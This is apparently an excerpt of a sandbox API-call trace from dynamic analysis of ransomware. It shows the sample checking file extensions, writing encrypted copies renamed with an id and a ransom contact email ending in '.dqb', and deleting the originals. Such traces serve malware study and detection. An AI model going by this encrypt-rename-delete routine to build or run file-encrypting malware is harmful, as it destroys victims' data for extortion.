lstrlenW (lpString=".jpg") returned 4 [0268.982] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0268.982] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.982] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.982] lstrlenW (lpString=".doc") returned 4 [0268.982] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0268.982] lstrlenW (lpString=".docx") returned 5 [0268.982] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0268.982] lstrlenW (lpString=".pdf") returned 4 [0268.982] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0268.982] lstrlenW (lpString=".xls") returned 4 [0268.982] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0268.982] lstrlenW (lpString=".xlsx") returned 5 [0268.982] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0268.982] lstrlenW (lpString=".ppt") returned 4 [0268.983] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0268.983] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.983] lstrlenW (lpString=".zip") returned 4 [0268.983] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0268.983] lstrlenW (lpString=".rar") returned 4 [0268.983] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0268.983] lstrlenW (lpString=".bz2") returned 4 [0268.983] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0268.983] lstrlenW (lpString=".7z") returned 3 [0268.983] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0268.983] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.983] lstrlenW (lpString=".dbf") returned 4 [0268.983] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0268.983] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.983] lstrlenW (lpString=".1cd") returned 4 [0268.983] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0268.983] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.983] lstrlenW (lpString=".jpg") returned 4 [0268.983] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0268.983] Sleep (dwMilliseconds=0x64) [0269.251] lstrcmpiW (lpString1=".log", lpString2=".dqb") returned 1 [0269.251] lstrlenW (lpString="bootex.log") returned 10 [0269.251] CreateFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.308] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=5120) returned 1 [0269.316] CloseHandle (hObject=0x1f0) returned 1 [0269.317] GetFileAttributesW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log")) returned 0x80 [0269.320] GetFileAttributesW (lpFileName="C:\\bootex.log.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\bootex.log.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.332] CreateFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.336] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.336] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.339] CreateFileW (lpFileName="C:\\bootex.log.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\bootex.log.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.395] GetLastError () returned 0x0 [0269.395] ReadFile (in: hFile=0x1f0, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x1400, lpOverlapped=0x0) returned 1 [0269.416] WriteFile (in: hFile=0x1f4, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0x1410, lpOverlapped=0x0) returned 1 [0269.417] ReadFile (in: hFile=0x1f0, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.417] WriteFile (in: hFile=0x1f4, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0269.417] SetEndOfFile (hFile=0x1f4) returned 1 [0269.417] CloseHandle (hObject=0x1f4) returned 1 [0269.417] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.417] SetEndOfFile (hFile=0x1f0) returned 1 [0269.418] CloseHandle (hObject=0x1f0) returned 1 [0269.418] SetFileAttributesW (lpFileName="C:\\bootex.log.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x80) returned 1 [0269.418] DeleteFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log")) returned 1 [0269.418] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.418] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.418] lstrlenW (lpString=".doc") returned 4 [0269.418] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0269.418] lstrlenW (lpString=".docx") returned 5 [0269.418] lstrcmpiW (lpString1=".docx", lpString2="x.log") returned -1 [0269.418] lstrlenW (lpString=".pdf") returned 4 [0269.418] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0269.418] lstrlenW (lpString=".xls") returned 4 [0269.418] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0269.418] lstrlenW (lpString=".xlsx") returned 5 [0269.418] lstrcmpiW (lpString1=".xlsx", lpString2="x.log") returned -1 [0269.418] lstrlenW (lpString=".ppt") returned 4 [0269.418] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0269.418] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.418] lstrlenW (lpString=".zip") returned 4 [0269.418] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0269.418] lstrlenW (lpString=".rar") returned 4 [0269.418] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0269.418] lstrlenW (lpString=".bz2") returned 4 [0269.419] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0269.419] lstrlenW (lpString=".7z") returned 3 [0269.419] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0269.419] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.419] lstrlenW (lpString=".dbf") returned 4 [0269.419] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0269.419] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.419] lstrlenW (lpString=".1cd") returned 4 [0269.419] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0269.419] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.419] lstrlenW (lpString=".jpg") returned 4 [0269.419] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0269.419] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.419] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.419] lstrlenW (lpString=".doc") returned 4 [0269.419] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0269.419] lstrlenW (lpString=".docx") returned 5 [0269.419] lstrcmpiW (lpString1=".docx", lpString2="x.log") returned -1 [0269.419] lstrlenW (lpString=".pdf") returned 4 [0269.419] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0269.419] lstrlenW (lpString=".xls") returned 4 [0269.419] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0269.419] lstrlenW (lpString=".xlsx") returned 5 [0269.419] lstrcmpiW (lpString1=".xlsx", lpString2="x.log") returned -1 [0269.419] lstrlenW (lpString=".ppt") returned 4 [0269.419] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0269.419] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.419] lstrlenW (lpString=".zip") returned 4 [0269.419] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0269.419] lstrlenW (lpString=".rar") returned 4 [0269.419] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0269.419] lstrlenW (lpString=".bz2") returned 4 [0269.419] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0269.420] lstrlenW (lpString=".7z") returned 3 [0269.420] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0269.420] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.420] lstrlenW (lpString=".dbf") returned 4 [0269.420] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0269.420] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.420] lstrlenW (lpString=".1cd") returned 4 [0269.420] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0269.420] lstrlenW (lpString="C:\\bootex.log") returned 13 [0269.420] lstrlenW (lpString=".jpg") returned 4 [0269.420] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0269.420] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.420] lstrlenW (lpString="correct.avi") returned 11 [0269.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.425] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=197120) returned 1 [0269.425] CloseHandle (hObject=0x1f4) returned 1 [0269.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0269.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.425] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.426] lstrlenW (lpString=".doc") returned 4 [0269.426] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.426] lstrlenW (lpString=".docx") returned 5 [0269.426] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0269.426] lstrlenW (lpString=".pdf") returned 4 [0269.426] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.426] lstrlenW (lpString=".xls") returned 4 [0269.426] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.426] lstrlenW (lpString=".xlsx") returned 5 [0269.426] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0269.426] lstrlenW (lpString=".ppt") returned 4 [0269.426] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.426] lstrlenW (lpString=".zip") returned 4 [0269.426] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.426] lstrlenW (lpString=".rar") returned 4 [0269.426] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.426] lstrlenW (lpString=".bz2") returned 4 [0269.426] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.426] lstrlenW (lpString=".7z") returned 3 [0269.426] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.426] lstrlenW (lpString=".dbf") returned 4 [0269.426] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.426] lstrlenW (lpString=".1cd") returned 4 [0269.426] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.426] lstrlenW (lpString=".jpg") returned 4 [0269.426] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.427] lstrlenW (lpString=".doc") returned 4 [0269.427] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString=".docx") returned 5 [0269.427] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0269.427] lstrlenW (lpString=".pdf") returned 4 [0269.427] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString=".xls") returned 4 [0269.427] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString=".xlsx") returned 5 [0269.427] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0269.427] lstrlenW (lpString=".ppt") returned 4 [0269.427] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.427] lstrlenW (lpString=".zip") returned 4 [0269.427] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString=".rar") returned 4 [0269.427] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString=".bz2") returned 4 [0269.427] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString=".7z") returned 3 [0269.427] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.427] lstrlenW (lpString=".dbf") returned 4 [0269.427] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.427] lstrlenW (lpString=".1cd") returned 4 [0269.427] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0269.427] lstrlenW (lpString=".jpg") returned 4 [0269.427] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.428] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.428] lstrlenW (lpString="join.avi") returned 8 [0269.428] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.428] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=222208) returned 1 [0269.428] CloseHandle (hObject=0x1f4) returned 1 [0269.428] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0269.428] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.428] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.428] lstrlenW (lpString=".doc") returned 4 [0269.428] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString=".docx") returned 5 [0269.429] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0269.429] lstrlenW (lpString=".pdf") returned 4 [0269.429] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString=".xls") returned 4 [0269.429] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString=".xlsx") returned 5 [0269.429] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0269.429] lstrlenW (lpString=".ppt") returned 4 [0269.429] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.429] lstrlenW (lpString=".zip") returned 4 [0269.429] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString=".rar") returned 4 [0269.429] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString=".bz2") returned 4 [0269.429] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString=".7z") returned 3 [0269.429] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.429] lstrlenW (lpString=".dbf") returned 4 [0269.429] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.429] lstrlenW (lpString=".1cd") returned 4 [0269.429] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.429] lstrlenW (lpString=".jpg") returned 4 [0269.429] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.429] lstrlenW (lpString=".doc") returned 4 [0269.429] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.430] lstrlenW (lpString=".docx") returned 5 [0269.430] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0269.430] lstrlenW (lpString=".pdf") returned 4 [0269.430] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.430] lstrlenW (lpString=".xls") returned 4 [0269.430] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.430] lstrlenW (lpString=".xlsx") returned 5 [0269.430] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0269.430] lstrlenW (lpString=".ppt") returned 4 [0269.430] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.430] lstrlenW (lpString=".zip") returned 4 [0269.430] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.430] lstrlenW (lpString=".rar") returned 4 [0269.430] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.430] lstrlenW (lpString=".bz2") returned 4 [0269.430] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.430] lstrlenW (lpString=".7z") returned 3 [0269.430] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.430] lstrlenW (lpString=".dbf") returned 4 [0269.430] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.430] lstrlenW (lpString=".1cd") returned 4 [0269.430] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0269.430] lstrlenW (lpString=".jpg") returned 4 [0269.430] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.430] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.431] lstrlenW (lpString="split.avi") returned 9 [0269.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.431] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=194048) returned 1 [0269.431] CloseHandle (hObject=0x1f4) returned 1 [0269.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0269.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.431] lstrlenW (lpString=".doc") returned 4 [0269.431] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.431] lstrlenW (lpString=".docx") returned 5 [0269.431] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0269.431] lstrlenW (lpString=".pdf") returned 4 [0269.431] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.431] lstrlenW (lpString=".xls") returned 4 [0269.431] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.431] lstrlenW (lpString=".xlsx") returned 5 [0269.431] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0269.431] lstrlenW (lpString=".ppt") returned 4 [0269.431] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.431] lstrlenW (lpString=".zip") returned 4 [0269.431] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.431] lstrlenW (lpString=".rar") returned 4 [0269.431] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.431] lstrlenW (lpString=".bz2") returned 4 [0269.432] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString=".7z") returned 3 [0269.432] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.432] lstrlenW (lpString=".dbf") returned 4 [0269.432] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.432] lstrlenW (lpString=".1cd") returned 4 [0269.432] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.432] lstrlenW (lpString=".jpg") returned 4 [0269.432] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.432] lstrlenW (lpString=".doc") returned 4 [0269.432] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString=".docx") returned 5 [0269.432] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0269.432] lstrlenW (lpString=".pdf") returned 4 [0269.432] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString=".xls") returned 4 [0269.432] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString=".xlsx") returned 5 [0269.432] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0269.432] lstrlenW (lpString=".ppt") returned 4 [0269.432] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.432] lstrlenW (lpString=".zip") returned 4 [0269.432] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString=".rar") returned 4 [0269.432] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.432] lstrlenW (lpString=".bz2") returned 4 [0269.433] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.433] lstrlenW (lpString=".7z") returned 3 [0269.433] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.433] lstrlenW (lpString=".dbf") returned 4 [0269.433] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.433] lstrlenW (lpString=".1cd") returned 4 [0269.433] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0269.433] lstrlenW (lpString=".jpg") 